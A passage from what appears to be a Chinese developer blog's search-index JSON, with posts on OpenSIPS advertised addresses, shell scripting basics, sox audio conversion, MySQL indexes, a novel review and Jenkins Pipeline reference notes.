的参数上直接配置公布地址。好处是方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外部进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS的核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发送到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个需要注意的SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要注意选择合适的网络地址。否则请求将不会按照你期望的方式发送。\nrecord_route record_route_preset add_path add_path_received ","permalink":"https://wdd.js.org/opensips/ch5/adv-address/","summary":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内网地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一系列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 的参数上直接配置公布地址。好处是方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外部进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS的核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发送到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个需要注意的SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要注意选择合适的网络地址。否则请求将不会按照你期望的方式发送。\nrecord_route record_route_preset add_path add_path_received ","title":"【必读】深入对外公布地址"},{"content":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. 
reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志要标记来自特殊的用途,比如说,来自 ","permalink":"https://wdd.js.org/posts/2019/11/xa694b/","summary":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志要标记来自特殊的用途,比如说,来自 ","title":"打印易于提取关键词的日志"},{"content":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 复杂指令集 ","permalink":"https://wdd.js.org/posts/2019/11/qy6ugu/","summary":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 复杂指令集 ","title":"Linux私房菜"},{"content":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的神奇经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 
君子国 君子国讲究好让不争,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,那你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了又死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。\n","permalink":"https://wdd.js.org/posts/2019/10/zfn92c/","summary":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的神奇经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不争,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,那你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了又死。\n10. 
深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。","title":"带你领略镜花缘中的神奇国度"},{"content":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","permalink":"https://wdd.js.org/shell/match-eval/","summary":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","title":"shell数学运算"},{"content":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","permalink":"https://wdd.js.org/shell/string-operator/","summary":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","title":"字符串操作"},{"content":"ab安装 apt-get install apache2-utils ","permalink":"https://wdd.js.org/posts/2019/10/pbv6ok/","summary":"ab安装 apt-get install apache2-utils 
","title":"接口压力测试"},{"content":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with 
`play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless. Output files will have the same format as the input file where possible and not overriden by any of various means including providing output format options. -v|--volume FACTOR Input file volume adjustment factor (real number) --ignore-length Ignore input file length given in header; read to EOF -t|--type FILETYPE File type of audio -e|--encoding ENCODING Set encoding (ENCODING may be one of signed-integer, unsigned-integer, floating-point, mu-law, a-law, ima-adpcm, ms-adpcm, gsm-full-rate) -b|--bits BITS Encoded sample size in bits -N|--reverse-nibbles Encoded nibble-order -X|--reverse-bits Encoded bit-order --endian little|big|swap Encoded byte-order; swap means opposite to default -L/-B/-x Short options for the above -c|--channels CHANNELS Number of channels of audio data; e.g. 
2 = stereo -r|--rate RATE Sample rate of audio -C|--compression FACTOR Compression factor for output format --add-comment TEXT Append output file comment --comment TEXT Specify comment text for the output file --comment-file FILENAME File containing comment text for the output file --no-glob Don\u0026#39;t `glob\u0026#39; wildcard match the following filename AUDIO FILE FORMATS: 8svx aif aifc aiff aiffc al amb amr-nb amr-wb anb au avr awb caf cdda cdr cvs cvsd cvu dat dvms f32 f4 f64 f8 fap flac fssd gsm gsrt hcom htk ima ircam la lpc lpc10 lu mat mat4 mat5 maud mp2 mp3 nist ogg paf prc pvf raw s1 s16 s2 s24 s3 s32 s4 s8 sb sd2 sds sf sl sln smp snd sndfile sndr sndt sou sox sph sw txw u1 u16 u2 u24 u3 u32 u4 u8 ub ul uw vms voc vorbis vox w64 wav wavpcm wv wve xa xi PLAYLIST FORMATS: m3u pls AUDIO DEVICE DRIVERS: alsa EFFECTS: allpass band bandpass bandreject bass bend biquad chorus channels compand contrast dcshift deemph delay dither divide+ downsample earwax echo echos equalizer fade fir firfit+ flanger gain highpass hilbert input# ladspa loudness lowpass mcompand mixer* noiseprof noisered norm oops output# overdrive pad phaser pitch rate remix repeat reverb reverse riaa silence sinc spectrogram speed splice stat stats stretch swap synth tempo treble tremolo trim upsample vad vol * Deprecated effect + Experimental effect # LibSoX-only effect EFFECT OPTIONS (effopts): effect dependent; see --help-effect 参考 http://sox.sourceforge.net/sox.html#OPTIONS ","permalink":"https://wdd.js.org/posts/2019/10/nw4wmm/","summary":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. 
with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory 
to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless.","title":"vox语音转mp3"},{"content":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提升,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。\n","permalink":"https://wdd.js.org/posts/2019/10/bs9nax/","summary":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提升,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。","title":"MySql索引"},{"content":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。\n","permalink":"https://wdd.js.org/posts/2019/10/awgyhh/","summary":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。","title":"关于v语言: 越是漂亮的语言,越会骗人"},{"content":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; fi // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 
// 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; fi if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi 判断文件是否存在 ","permalink":"https://wdd.js.org/shell/flow-control/","summary":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; fi // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; fi if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi 判断文件是否存在 ","title":"流程控制"},{"content":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","permalink":"https://wdd.js.org/shell/colorful-print/","summary":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","title":"彩色文本与彩色背景打印"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. 
(If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)\nSome methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. 
Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.\nHowever any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.\nA set of environment variables are made available to all Jenkins projects, including Pipelines. 
The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. 
Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISIONAs an example of loading variable values from Groovy:\nmail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. 
